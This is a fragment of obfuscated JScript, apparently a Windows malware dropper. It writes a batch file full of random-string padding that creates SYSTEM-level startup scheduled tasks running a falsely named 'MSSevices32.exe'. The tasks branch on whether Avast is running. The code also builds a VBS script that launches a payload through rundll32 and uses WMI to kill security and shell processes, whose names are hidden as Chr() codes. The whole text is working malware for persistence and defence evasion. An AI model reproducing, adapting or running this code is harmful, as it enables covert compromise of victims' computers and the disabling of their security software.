R9cs39N4.WriteLine("::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");
R9cs39N4.Close();


j3Tezo2PL9ok.Run('%comspec% /c ' + IDxyPFq3XxAOsK4kEF + ' bitsadmin_ schtasks cmd rundll32', 0, false);


var aspas = "'";
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(j5tq1MW730);

R9cs39N4.WriteLine("@echo off");


R9cs39N4.WriteLine('SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:01 /TN "{D69166F8-5801-4516-85C9-A9AB6BF664E2}" /TR "%WINDIR%\\MSSevices32.exe" /RU SYSTEM');
R9cs39N4.WriteLine("::lv5Cs4oDfyiOS1DLdU52VNw0YuwL9fCK4QW70ps3810k20m8lLhpN9n6GNIB7F626ostWvmY0g1lr60HDKPd9193Cj1RQRV70cB7Zdpf87Im3DnGv2s6yWpT6hq10wanMvLdKLdpdlSDzV66PwWbaaouSAIHf2ZFxM4cX10shxK491z5s9cPC4ZVWWTIFhRwJS9N5tYxhzZF3PULTBK28pmSiF8R43B4Mr7wj78M6WP0nG1Cdq3Y5mQFyl400tlpOgFuWD0eSqHqeMCIbgvJJj9B71h6vh0WJxz37nBQ9okkC59F7rm14qbbl2VCPHgL1dfgVlagPDPXplu9biC8SL5pR64AS3Q2eJT8ddH7Dw6iTiETutUKp71dOYB1y0RQtd4a0I6j3aSY4hIhcESIByhSmD3ivO7YnqbxlqGUBoQhu2hO79JYVXH4iQ6taz05M6Z7F6iIXTDoQAouGrXoH8Trwf039I9virS4SyrKQL1dx7gEqz4yg4s65N1M0d1Ra6ea4t8D704xwab0SLTx65Mt0fmL1CVTTOkZrT9HJS5cbrphIgfpPBjaHp6pYcAu1V0kunJL1EaNN187kCr1Y6s3ajoV9Drk38fQmyodk2m6YxYmNF6dxi5cO55Y44FUnVg96elTRi3JYbHHucSY16n8EbAHoCEPN9eX0FK1WppajkY3LkxJLkV4qE6NFX9ru1ZXvHp140iL0ehtkSi755cP0dLuuAZEwDpnY3D7LRsehsd3SqVme9vFZvd3ruxIlMpZw4GZDpwzjCUSbSbOqLW6f9EdSAsr");


R9cs39N4.WriteLine('SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:30 /TN "{26B75C81-B815-4466-9DC5-5C91B370BADA}" /TR "cmd /c tasklist | find /i "' + aspas + 'AvastSvc.exe' + aspas + '">null || %WINDIR%\\555500.bat nogui ProcessHacker.exe" /RU SYSTEM');

R9cs39N4.WriteLine("::d9Kz7la2tlJp9o94W90qS0b82wTLLn5oqHG750R7WNs02w0A9YI1kiGMsJVzMS0j2RIAp5NkY0rdniYF6yjpROVgY733IN5N734SkrYSJlmN70ypYRaGb2pd99BD6Tp3I74FX359JeA3LCQ2orwz1JNJkvsvHTZOupbqBjIvA02Vn1JNB2zJnC08bXarVA42u6elsmufaT8H9Ovn11tg179Mo7Qxa6XF2Dd3it78ScOF6mCP9s21Bsu81n5hJ0hmSHseivx960E9u1eY8FSkvt8m3Ln8Lgbopnwq8LOl3KY3lioblIFHYi6UcN9aqWqDAc49f8qkNuuqq6bxUYuFed3VlPIoRZ60FW7aIRTCFZOgnY5ZwTi7ruuBvR4qQQbHC8RK6C1pD5H3UvWUVYVKvx9");

R9cs39N4.WriteLine("TIMEOUT 5");

R9cs39N4.WriteLine("::GTumM7UG61TPRyQPkwr2W5Y2m0XX8ZQBb9crel7we6vrY0DS8v01E86y0bjt3zvxfjuZpX5zO1qkdTxKiYa7QH6hgrP5vY6k1yqPM3wBoshG4K88k9lUh90K9CD34U0533G9O31WlCB73yzUe05ET6rKyn8lmBf5DHwnQBTBh14zFf1Sf62pMKA8tQ79Bk1tdLbTMJyNgLLg9Ziywptr1ATRA4CdQnpqgwS1g6uhYIb8VyjBoG8Q1ovD0TXHPpIErOwKhwzR8Rg8MXeINSwqnyrpuDehXnoyFpnxKoeN13ozpldb0QzyjB95XwZTXlKwG6yFtg5vCuFdQhpNU29g9I5eDs0AXGEvIdl6B3XREdE0Hy98ubjXI9Yd350sU2qQybfzqu40i1r1KhaGu0qDmp0iDT36FPI5L4NrRo335kOGujoNY3");

R9cs39N4.WriteLine("TIMEOUT 5");

R9cs39N4.WriteLine('echo On Error Resume Next> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

HahufcN4eipPc2rgBizIEHcTwHc1iCpX33Jj2EePZUwgvYm3Dn830uGzWm9X9B88FacxEfRLKLX81MPKyteM1aVxtKc9fhy30NNDy2YXA3XOFykdKGH4iL5mqBSnAqNl3fg5lo12e4w8x7cROFyq2gHvIuuLFloAguNjIOP5AP0gQUfwqmWy3CrBEF602fLNhZ15gustSxSmKrkEvW4pbzxYC1Y6Mqd3eDvMq33LAOkk2htBzPJyf5yFsTtDbUtUW5EGU1cj2N7tA6vthzFmV5hLb4iD9m2ol3SPBzr3GSj5Rsp15erSV6eg8Nt31KVyttox0VJ7Cpk21DjRmwDcsJvJMbj7wmOVsO5NLYWW6s2aR6bJoA3abl129ZnOHvGiUy2XUkzKPECJMBorFCt2fJpNt80k6s09TMAn14wAoDFfes2yTuhll6Jq3PEfrGdO8gk1BH9mZECcDcAWf5e674C5MNg3145Q7gMU5ey3GNGU1R4211NUZqj1GK7kCX2S09Od7IsJhG9o4qZB7JYttRvTq0ZBL7qmHG6e5GiQTJPcYP7zg4xx7Us28kKHpqtt4G3um8H12Esz5e0A4i8J186FUt37KGJZGsrtbgQXwpVI8wV6Gny0N48h0xpc7v4u5rzRvf0c3rQcpW1af4RgubWc2dpTEua1Lnf179ZBTqPkXMHKEOluO0tKJV2MzqR804vbh2Rz0F94eQ9dw90K7I87U52G4m17qpeD7fwZ7R53T7t15WfcuH99ghH");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::xLO4Mhmoa8eHTII28mKjR93S1kPFP2cx8tveSjh5aOLfp7g54IX8Ilq7ip1bzCGD90rFH2qkIxZZ17T3sMb2LJ85nha176KZ5tv4BpTWtSr3OrelqZpy8rUy02jftSfgW0GGQ0oG4JvX0iZ0pDaAlU0kna9W07AaHb7cw5YLUKUKrzpe30tOUYXghY3MMz7Q85BSXOXjaaUxIHx0XPYskEldJLmS5FsEp8RBr9DQDNI1Cg87jEOTda3566iKeuVIC21MWM74k93j47DCs9apCoCdn36FBYzxc7kDr9PeH75kfb5b0jcy5F0MiTE7G4xvZ9yU3JgmHtrGIr3bJ33A8M3X488hCbd0wuI1DcO0e1Xjx7h3236XU026BQdI8cCtem3Veeoj87C9z6xDB3CVB7bJ99dR8aMUEoDS85IaTekXG3XobhK301uohQ2BGFh9yNPuvz6o2YOGs7i02SL3YpiXuv4oZ89H6vS4EJ0lgKJhR4KcovU90EOUYENJh0b3ICdhR2LU0GcLFwMFoahPG89a452gQ358WKn28H27o5j69dhb882Y3yp7I5m4n0tXHIf7Bg1Wsa38OccBUYH2Ao06345La9U38tF5NG8T6BZmQTk3GkxmptNXuSM5MyBGGHiRyeBFlG5N9431qZ45o1I4a9IRgNR0Cb3xdSM9dWk4MGb93M814SKW9a29ljcnSjmADlki41Q82BFMg2tDG2feK831kPbejsoq2tedXEG7Rl8cRaqXZeidycj95ceVco4mZX6JH8CM2a1bx4wRdZrj4q2Dqs5bImotauN0LhK8o91xpCo1YM5w2MVl4WLrQ73gIGx51");


R9cs39N4.WriteLine('echo WScript.Sleep(90000)>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");
R9cs39N4.WriteLine('echo xTsNBe0z1.Run("rundll32 %LOCALAPPDATA%\\Temps\\tykeo13w.iqld,#2 VEi8sQm")>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');



R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo RAj9WSg = ".">> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo Set UPOfAz2RnR = GetObject("winmgmts:" ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine('echo "{impersonationLevel=impersonate}!\\\\" ^& RAj9WSg ^& "\\root\\cimv2")>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::y21R31csumbJDk8TR7tp0755N9d48EAZi2Is0nUPj2DVqf7hbWayGb842U6VBjT8IHfVylrFvS2PyJPv6schMmSvInrL0O3iwz2O40nBbHMl19WTEfG02QM5b312Nr1FEEyYHY6Xa6P2oHc0J75IkG5f63SKS0qFTOM63iiyKl0HcmrGOb987724LVn209h5966EM6KaQONT9XX254PtVk5dounm1c9aUe2Yv1GQKIfox4GdZ1zg7DYnU1P3gJ9se95JfGp20gP7L12CYM7B0yaY3BaG9ZIdIg20NSzwzxw0Vxg9gznh53s0KH366y7l0344Ig269aNMryAwB8LPQ11slM1mXRf8cqPZWUebcYZKqY27zIhxcPVuh1TYDu8Lqtdb4o79D1yMhZPscSYhwh18APeZH8fspufLCRRoOlvttGcenlqpl7N3w1gWf7FiNp9hRCXzZxpPFBju4WdyBhDHE6zMTm7wDB41zyVd21DEN4l2BuaIw4n22U9CvRLEh6mTSVXCEJz078QA4vQH83acF5g3m2105PFY8Ly6rP6B035qno0T5mFwE2IZEv5qIb18J7Z1EiQwlpkR1Qi2AoLpx2kKvH507OJ773uK29hVp1VJU1WYAQbnC5UXu7cy92h23h69J39Hk49Nq7Y3k1aubgeCTgJV6JV84I93dqVRRnHy7q47VeVMlHxyAt8RapPqK1OgULjA1L7l0SQHEqPlWMxD6l59aPGe2JW4JdeR4CFRe01I38T9R4d2jz2ZJTI6y2T19prK8c9FD5J09jcGorNESqC2X9EQ7Ud2YDKZwGKMhJ84a2z05m9gB5oAdSROanlRXZ4Tme8bSS2EYkDaH62621LYl028z5Q77zxO1tI40qjhkzuUN2A1ioo0ESfrZW7L2aCEM1KxeOa0xyTYce8FuZDw15XsicIBc6FpaC60HjaxsNSxEGZP4TeDqw8Yg48qY61wfp4wMar5CZXsE12SL44i6Z8oMi0CCikJJEuKx0B9W5W43nPtQwMZjfKs3yI2KYE6MS1jTXHo6");

R9cs39N4.WriteLine('echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');



R9cs39N4.WriteLine('echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');
R9cs39N4.WriteLine("::MXqU26BYW9QnalvVuszFDGgpmoDc20uz7wjsDStjRoS4yOP35viELxEAwjF7rOJAfWQd4FeV6Y2gRtDJUxg0FBPn1KHDZ7EFaSuv3h8gbgytCRgPxoIQlbJ2G7MOi8d2VcHRA5AVwQ53rP8levfLk6Hf2y7moZm51x8J8H7q5CK3VcCE9LraxgfzmZAUYRErfAmz8N8t10gNeO609u4iZ232UwJ8ecMP9GRmBmhd1REiT8kNNRlNK4icrO3T98Pv12vJDRiSpeBz0nQ3clTw9aYK0FNQ3X4NeZzG4Tl5RRfOTHzg5Y09pVkC8ct9rjPB5ze6j3AJFW5CL2Y8s641DWr7y1z5mFMIFd4pv4U81tzDc8nls88Z8POLo3V4obXoOje5OO65W5ndsL0qA4QRSWOS7XVxDRyM95ykdXQIbabsll4Ww43GqyIpA908Yakr5cgzqnSnxp8TS1hEIkWn859gLFr5a7E2V0RhZqZ8PvVQqyG9rr1eiHQcgnbyXip5GRQ71oqVvUiUDaY6EQsXyPrp06XT479Rbs11l5Hl68NeACCCCGj95Lh5km1qtQ2C6mYnAy6C0Ms3mm58icthpnM8jXft4OV58Z28U6BwcrM50m27kCZ99ym0Gb5gDOAvUMG5Djp26k7D22oTEEZpZjWXE9ljA8IVb8SFpxONtsh88RIXeH6MLWh6DX9Us1wxAgCBhG54Pmi47x2cs6Rw8xF639lOqC43fvb87T7248PnrjBvQR2dANF7XX4VLPGOET09rpcyWW9xE3EYLVcP3b2qzN3OOxneO9h6gZgLZtSKq7adC71gNTRKQtiX2tL8MW10Gjj99fZLWQ5FFdnz000iQvi8eNFNMaoVdWceW6q93gzZzRn1C5Ib02DSef5HqnjlUXGD8Op9Qx7Xk7u625yWtunRLmA055ZIFcs0nYV9ExRn5Zk1GDXzScz8O19X10L3VskYC4lScgn8817B5O8XouYubRd9MEGw971G6Ikk1jkTW5HAYYZ8i95JDHOoxg9wzWqHVJ17dHL9G43FjoO9GafR2XjD334M6VaNsMCskes0z6xCnXF0h0982VV4S4jroP983xSS3dxfB5nOv5Uu0WW9G0tn3NT9SvLsM13M876fvpep8RQ3D289UEO1bYWcHRhuudHSpI7Z7MFkBqL8o7g1Rgf4NFynTkYuwB6JQXgXu8KUPjiNKf85NLvoN5F7LK00lbJ7hfEJm1lNxQMX66315RYAb");

R9cs39N4.WriteLine('echo Chr(039)^&Chr(103)^&Chr(098)^&Chr(112)^&Chr(115)^&Chr(118)^&Chr(046)^&Chr(101)^&Chr(120)^&Chr(101)^&Chr(039))>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo For Each gQ0GVRiRzf6e0 in h50KAQ29554T>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine('echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');
R9cs39N4.WriteLine("::pjmx137rn8Rky4WWT1h6DHMCo14bMoGv458e3Clii6xk909w7jC3bPe5435Cp06PIf6jXQjJLwxKl7oQPrzXSqfTKu42IbPHOiX2e2Qr7UaTDkq2TKO6F1SonsaIuOU3v8tailFwyHYWjm95indWaN7unIv9GdkbBLoBwn5S710N46xq6BwjnbNP1846Sc55iTFpFp8hzVkaaJ0qpXL6SjNB8xi09W45NePb8441RrZW4hJYpAi1Pec1CDc1WzqBqxHEvHSG2K99hh4xQyt8rNV5w1XEwbx4zCshcoPAVATk9X8b7c2B8Y1c6F28FRYCsuaYnYU5V8ffncGk1RVZ7jQPMo9H9c4ip4Rf0jA5i8hx0xqE30l2D0I48HYMltU8HL7kvj1yXEff76s8M3v1PO9aKMF1oW2yvZMbAAKveyxP7MOWtsDwAAHlfOLAfe8tIbKh58p4NfD84ha6pj4SuW8wYU6F6u6lNeNBseGBgLcbhHQyREcaFb4f8Zj292365iH1o48L5gQUIr388PGXi6PMVTzCIpYKM1bCtK0AXS7fTuwBp0QV6cXzI8Jukgq1784VoKvTSFJ55TSzUeT80NM6a237NBrfz0kl5wlPAw0yMf9T3jacjR8hy0hcg4I4tU3cz9Ci501hjy7a888fyeu7CFD9zK4sBxf0W6j942Gv0ZMknPk3Z9aBTg8MJU1Nc1PcOd67uKV4f3t2Sx9x8ZF47pEVcYAxz6B4rX3mK29c8Tz0wDg9uu6IICiLJqFgpGWdFoZD9KO8l8yov1WgFonJTN96E1Swwc85BYCxKmUlKpnnBKjT1G4PWLjan4nmMFxVv1l1eFXib5QffI2pdq7y0ECy5xrB6E2o1QuA1AuX9ug6leF81k1Aq7rCyOP5BHSXWx0dgQA191747y3HcoBx1UqPwsRrELcgH60x2i7e6Qbcax1fdout34I5u0nezj1BaWEEijZnxrXpmVRyIAHdJM6ItsVy7LaPkn7xW5hXpKeoTRz97u7vPUWP2G5zvMSxzLELvpaiJ5OujnB20AR3uOp3xjDnej8ysX9P0vFwuNOMdW54di71299c8Uo7JNkw4pVXHK0Ou2kgiswCdJZtbJtV1DJkqcFTnq4Rq8m67Dxs385b1L43YI3Q4WD615nG9iNW05muVW3LBLsedFF74y6h7I7RYeM6qKY4U6n978LHVEGZU4k967p35R5N93mPHy38v08Q1NLe8UKra3R6GUBL6vOz5f1QBecgk80aqlmz1oKa9L26y77IFlQiBvI6YLMYH8mGwASZtT1NI45zjzX9yYjUSAbNwystjqg5KMMdSnh6m20rvc5LqHo2KcDv480EKzl1w829J96srL3OOKS81enQ85YpVRCnnuCTqd0ju9ssAeE55RzO9l2X1dfmsrQdesIC6tRdgFeZ6Fz6TLBcuyTc0iI6jn2OXZkco8BzQE3WPlL25i15k22J9uF5N2KsZ6ce73fRP5HdhC2IIG1otL0iOemMtD8L55k3U545DZbY1675T7TDI1GN01oPN5M95DNP5Xawzdc5Zd92q87u46nRNoHGDy57uJpcV2Z7XoC9w1D78VGaMQ2w7VtUTEmG1z0xbfVpZNAffugZoyZom3X5q5yQO2VjNQPTxXyW0AIZUbICX08w05wtN9guJTikQp1Knssh6BVPTTjFxvjIfWGQ8BZRvYe5v07tH12gPmc81Oucizy5z0Z6OoVHZ7YU6HJ27Nc2Y4MNy8Go3AUyaBHH8XpZU8Q139X02N2OX0P8dW955fUgUyiY9gJtZi1OWmBjVjTS5KH9Zs2Q5KtmiCnQFEErr3sVc63yFQP6x1wJ80asg58pGw481W2sox17zD65O4Ddq5m0Y8Dr066Rsp9RNgDlK6McWjjbX3u9XbgsD4y9jePzkDA8NG9WX32KpB313Y80fyt26xUhY2Ja871doBHQhB5Ay53R7rKHW5BaCKwyY6e9EuqKi244lefPl38q2d1466Z95eWB1b5y8JgEopT2s4jaQ0fF0p21VcnAYVK29O249n9ARbG55n6O65DlDE404gTz8dajWv1jzFxLPfNwwljDIc2zK5sr5vJ2TuNQq4io8kD481K8PgDCHrpjpH2B11Q2UDY7189ATKcgkPVGDGoQQ8qT3yM7YULu57Cu3t98mVnblt80qAGRDwgCqb9juDY70hhuTcy8i65YF8w2UVUXChlrambu06rGH44Nq6PkO1so5VStB28T45hyz");

R9cs39N4.WriteLine('echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');
R9cs39N4.WriteLine("::aRXnffDlrp0D6N9XN7mpO0Ws7385lyrvyn20Z53Kc23g5mYfEC85PV0PWsyu85w0Q8uTVi20xnKly634EtPz5rOxWdb3m7sDne02iH3DL8MdjMqz7vMAaEAG4OcGxELzSXwEbRwtKSyVaaC7WI7t3cKLM8IMHkl5ygb7h9950joxdZI9B1LIPVF18ky3cB3k1Vtf23T2");
R9cs39N4.WriteLine('echo Chr(039)^&Chr(101)^&Chr(120)^&Chr(112)^&Chr(108)^&Chr(111)^&Chr(114)^&Chr(101)^&Chr(114)^&Chr(046) ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

